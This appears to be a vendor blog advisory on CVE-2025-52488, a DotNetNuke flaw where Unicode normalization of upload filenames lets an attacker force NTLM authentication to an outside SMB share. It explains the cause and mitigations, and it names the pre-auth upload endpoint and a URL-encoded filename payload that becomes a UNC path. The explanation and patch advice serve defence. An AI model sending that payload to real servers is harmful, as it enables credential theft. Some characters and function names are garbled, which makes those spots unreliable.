You are currently viewing NTLM Hijack: DNN Users Urged to Patch Critical Unicode Flaw

NTLM Hijack: DNN Users Urged to Patch Critical Unicode Flaw

DotNetNuke (DNN), a widely used open-source content management system (CMS) built on the .NET framework, has a critical vulnerability. This flaw, CVE-2025-52488, allows attackers to hijack NTLM through a Unicode normalization bypass. This can lead to the theft of sensitive credentials, potentially compromising the entire web platform. Let’s dive into the details of this vulnerability and understand how it can be exploited.

Vulnerability Details

The core of this vulnerability lies in how DNN handles file uploads and processes Unicode characters. Specifically, an attacker can inject a Universal Naming Convention (UNC) path into a file operation. When this happens, the system initiates a Server Message Block (SMB) connection to an external server, inadvertently leaking NTLM credentials.

This issue arises from the interactions between Windows, .NET, and Unicode normalization. File system operations in .NET can be risky when user-controlled input is involved. Functions like File.ExistsSystem.Net.HttpRequest, and System.Net.WebClient can become “sinks” if an attacker injects a UNC path. Consider the following example:

if (File.Exists(Path.Combine(this.StorageFolder.PhysicalPath, fileName))) {
    // ...
}

If fileName is attacker-controlled and contains a UNC path (e.g., \\\\attacker\\shareThe Windows system attempts to access the remote share, sending NTLM hashes.

Root Cause

The vulnerability is rooted in two primary factors:

  1. Handling of Absolute Paths in Path.Combine: In C#, the Path.Combine Function’s behavior is crucial. If the second argument is an absolute path, the first argument is ignored. This can allow attackers to bypass intended directory restrictions.
  2. Unicode Normalization Issues: DNN’s file upload logic includes a sanitization step to convert Unicode characters. However, if this normalization occurs after security checks, it can reintroduce forbidden characters.

For instance, the Unicode character U+FF0E (FULLWIDTH FULL STOP .) is normalized to a period (.), and U+FF3C (FULLWIDTH REVERSE SOLIDUS, ?) becomes a backslash ($$). The relevant code snippet is as follows:

input = Encoding.ASCII.GetString(Encoding.GetEncoding(1251).GetBytes(input));

An attacker can craft a filename using these Unicode characters, bypassing initial filters but resulting in a malicious path after normalization.

Proof of Concept (PoC)

The flaw can be mapped to T1187 – Forced Authentication vulnerability, which can be exploited pre-authentication at the following endpoint:

POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false

A sample payload demonstrating the exploit is:

filename="%EF%BC%BC%EF%BC%BCexample%EF%BC%8Ecom%EF%BC%BCshare.jpg"

After Unicode normalization, this filename becomes \\\\example.com\\share.jpg, which triggers the Windows server to leak credentials.

Impact & Exploit Potential

By successfully exploiting this vulnerability, an attacker can trigger an SMB request to an external server, enabling the capture of NTLM hashes. These hashes can then be cracked to reveal the credentials, leading to unauthorized access to sensitive resources. This TA0006 – Credential Access can have severe consequences, including data breaches, system compromise, and further lateral movement within the network.

Affected Products

DNN versions from 6.0.0 before 10.0.1 are affected by the vulnerability.

Mitigation & Recommendations

To mitigate this issue, upgrade DNN to version 10.0.1 or above.

To prevent this type of vulnerability, developers must be cautious about the order in which they perform input validation and Unicode normalization, especially when dealing with file paths. Key recommendations include:

  • Validate Input Before Normalization: Ensure all input is validated before any Unicode normalization occurs. This helps prevent malicious characters from bypassing initial security checks.
  • Sanitize File Paths: Implement robust sanitization techniques to remove or neutralize potentially dangerous characters in file paths.
  • Use Safe APIs: Avoid using functions  Path.Combine with user-controlled input without proper validation. Consider using safer alternatives or implementing additional checks to prevent UNC path injection.
  • Regular Security Audits: Conduct regular security audits and penetration testing to identify and address potential vulnerabilities in the application.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.